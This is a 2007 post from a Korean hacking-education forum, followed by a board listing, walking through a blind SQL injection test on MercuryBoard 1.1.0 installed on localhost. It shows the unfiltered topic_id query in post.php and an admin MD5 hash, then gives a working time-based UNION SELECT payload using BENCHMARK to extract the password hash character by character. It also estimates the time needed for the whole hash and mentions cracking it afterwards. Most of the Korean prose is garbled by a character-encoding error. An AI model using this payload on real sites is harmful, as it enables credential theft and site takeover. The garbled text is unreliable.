1581, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   chenkim4
   chenkim4ÀÇ mercuryboard Blind sql injection Ãë¾àÁ¡ Å×½ºÆ®Æí

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=847 [º¹»ç]


ÀÎÅͳݿ¡¼­ 2005³â bugtraq¿¡ ¿Ã¶ó¿Â sql injection Ãë¾àÁ¡ÀÔ´Ï´Ù. (Linux+Mysql+PHP)
¿Ü±¹¿¡ »ç¿ëµÇ´Â mercuryboard ¶ó´Â °Ô½ÃÆÇ¿¡ blind sql injection¿¡ ´ëÇÑ ±ÛÀÔ´Ï´Ù.
www.mercuryboard.com¿¡ »çÀÌÆ® ¹æ¹®Çؼ­ ÇÁ·Î±×·¥À» ¹Þ¾Ò´Âµ¥
ÇöÀç ÃֽŹöÁ¯ 1.1.4 ¶ó¼­ ±Û¿¡ »ç¿ëÇÏ°í ÀÖ´Â 1.1.0 ¹öÁ¯À» ã¾ÆºÃ½À´Ï´Ù.
°Ë»öÇؼ­ ã¾Æº¸´Ï http://www.mercuryboard.com/files/old/mercuryboard-1.1.0.zip
¿¡¼­ ãÀ» ¼ö ÀÖ¾ú½À´Ï´Ù.
mercuyboard ¼³Ä¡ÇÏ°í Ãë¾àÁ¡À» Å×½ºÆ®ÇÕ´Ï´Ù.

http://localhost/index.php?a=post&s=reply&t=1' ¸í·ÉÀ» Çغ¸´Ï ' 󸮸¦ Àß ¸øÇؼ­
sql ¹®Àå ¿¡·¯°¡ ³ª¿É´Ï´Ù.
SELECT t.topic_modes, t.topic_title, f.forum_name, f.forum_id, t.topic_replies FROM mb_topics t, mb_forums f WHERE t.topic_id=1\' AND f.forum_id=t.topic_forum

post.php
$topic = $this->db->fetch("
   SELECT
       t.topic_modes, t.topic_title, f.forum_name, f.forum_id, t.topic_replies
   FROM
       {$this->pre}topics t, {$this->pre}forums f
   WHERE
       t.topic_id={$this->get['t']} AND f.forum_id=t.topic_forum");



¿¡·¯°¡ ³ª¿À´Â°É º¸°í ÀԷ°ªÀÇ ÇÊÅ͸µÀ» ÇÏÁö ¾Ê´Â°ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.

Å×½ºÆ® Çϱâ À§ÇØ ³»°¡ µî·ÏÇÑ admin Á¤º¸¸¦ µðºñ¿¡¼­ Ãâ·ÂÇÕ´Ï´Ù.
mysql> select user_name,user_password from mb_users where user_group=1;
+-----------+----------------------------------+
| user_name | user_password                    |
+-----------+----------------------------------+
| admin     | 81dc9bdb52d04dc20036dbd8313ed055 |
+-----------+----------------------------------+
1 row in set (0.00 sec)

À¥»ó¿¡¼­ user_passwordÀÇ Ã¹¹®ÀÚÀÎ 8À» ¾Ë¾Æ³»´Â°Ô ¸ñÇ¥ÀÔ´Ï´Ù.
ÀÌ ±Û¿¡¼­ »ç¿ëÇÑ ¹æ¹ýÀº time delay¸¦ ÅëÇؼ­ ÆÇ´ÜÇÕ´Ï´Ù.
MSSQL ¿¡¼­´Â IF [QUERY] waitfor [TIME]. ¹æ½ÄÀ¸·Î »ç¿ëÇϴµ¥
MySql ¿¡¼­´Â BENCHMARK() ÇÔ¼ö¸¦ ´ë¾ÈÀ¸·Î »ç¿ëÇÕ´Ï´Ù.

À¥¿¡¼­
http://localhost/index.php?a=post&s=reply&t=1%20UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%20=%20CHAR(56),BENCHMARK(1000000,MD5(CHAR(1))),null),null,null,null,null%20FROM%20mb_users%20WHERE%20user_group%20=%201/*



http://localhost/index.php?a=post&s=reply&t=1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(56),BENCHMARK(1000000,MD5(CHAR(1))),null),null,null,null,null FROM mb_users WHERE user_group = 1/*


¶ó°í Ä¡¸é IF Á¶°Ç¿¡ ÀÇÇØ ÂüÀΰæ¿ì 10ÃÊ ÈÄ ÀÀ´äÀÌ ³ª¿É´Ï´Ù.

°á±¹ Àüü ¾ÏÈ£¸¦ ¾Ë¾Æ³»´Âµ¥
0 to 9 --> ASCII 48 to 57
a to z --> ASCII 97 to 122
ÃÖ´ë½Ã°£Àº
(Àüü¹®ÀÚ 35ÀÚ *3(º¸Åë ÀÀ´ä½Ã°£ ÃÊ) + ¼º°ø½Ã°£10ÃÊ )*32¾ÏÈ£±æÀÌ = 3622ÃÊ (´ë·« 1½Ã°£) À̶õ °á°ú°¡ ³ª¿É´Ï´Ù.
¾ÏÈ£¸¦ ¾Ë¾Æ³»¸é MD5¸¦ Å©·¢ÇÏ´Â Ãֽűâ¼úÀ» »ç¿ëÇÏ¿© ¾ÏÈ£¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ½À´Ï´Ù
--------------------------------------------------------------------------
À̹ø¿¡´Â Ãë¾àÁ¡µµ Å×½ºÆ®ÇÏ´Â °ÍÀ» ½è³×¿ä ¸¹Àº µµ¿òÀÌ µÇ¾úÀ¸¸é ÁÁ°Ú³×¿ä
Ãâó À̰͵µ ¿ª½Ã ¹ö±×*°ÔÀÓÇÙ*Å°·Î±×*ÇØÅ·&º¸¾ÈÅø ÀÇ ±¤´ë´ÔÀÌ ¾´±ÛÀ»
Âɱî(<-’y »çÅõ¸®³Ä?) º¯Çü ½ÃŲ°ÍÀÔ´Ï´Ù

  Hit : 10195     Date : 2007/08/28 03:27



    
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 18779
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
02/11 237
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
07/25 733
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 1566
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 941
1576   (²Ä¼ö) L.O.B Çѹ濡 Ŭ¸®¾îÇϱâ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/14 1285
1575   towelroot.c (zip) ÄÚ¸àÆÃ.[1]     scube
08/18 3808
1574   levitator.c (¾Èµå·ÎÀÌµå ·çÆÃ) °ø°Ý ºÐ¼® ¼Ò½º ÄÚµå °øÀ¯.[4]     scube
08/17 3713
1573   ¹«·á Á¤º¸º¸¾È ±â¼úÀÎÀç ¾ç¼º °úÁ¤ ±³À°»ý ¸ðÁý     chanjung111
06/17 4519
1572   K-Shield ÁִϾî 5±â ¸ðÁý     lrtk
06/17 4245
1571   [ÆÁ] ÆÄÀ̽ã 2¼Ò½º¸¦ 3À¸·Î º¯°æÇØÁÖ´Â »çÀÌÆ®[3]     ÇѽÂÀç
05/13 3954
1570   ±¸±Û ¹é¸µÅ© ÀÛ¾÷ Áú¹®¿ä     wkatnxka
03/30 3381
1569   [ÆÁ] ¿ìºÐÅõ ¹Ì·¯¸µ¼­¹ö     ÇѽÂÀç
03/09 4079
1568 ºñ¹Ð±ÛÀÔ´Ï´Ù  °¨À»¸øÀâ°Ú³×¿ä¤Ì¤Ì     À×À×À×
01/15 3
1567   µ¥ºñ¾È °è¿­ ¸®´ª½º ÀÇÁ¸¼º ±úÁ³À»¶§ ÇØ°á¹ý     ÇѽÂÀç
11/27 4561
1566   È«º¸ÇÕ´Ï´Ù. ½Å»ý º¸¾ÈÄ¿¹Â´ÏƼÀÔ´Ï´Ù.     kimwoojin0952
10/26 4283
1565   ½Å±âÇÑ ÇÁ·Î±×·¡¹Ö ¾ð¾î[3]     koreal33t
09/06 4683
1564   À©µµ¿ì,¸®´ª½º¿¡¼­ ³» ip¸¦ È®ÀÎÇØ º¸ÀÚ [1]     koreal33t
09/06 3883
1563   CTF »çÀÌÆ®[1]     koreal33t
09/06 4544
1562   ÀÚ°ÝÁõ (¹®Á¦)»çÀÌÆ® [2]     koreal33t
09/06 4360
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org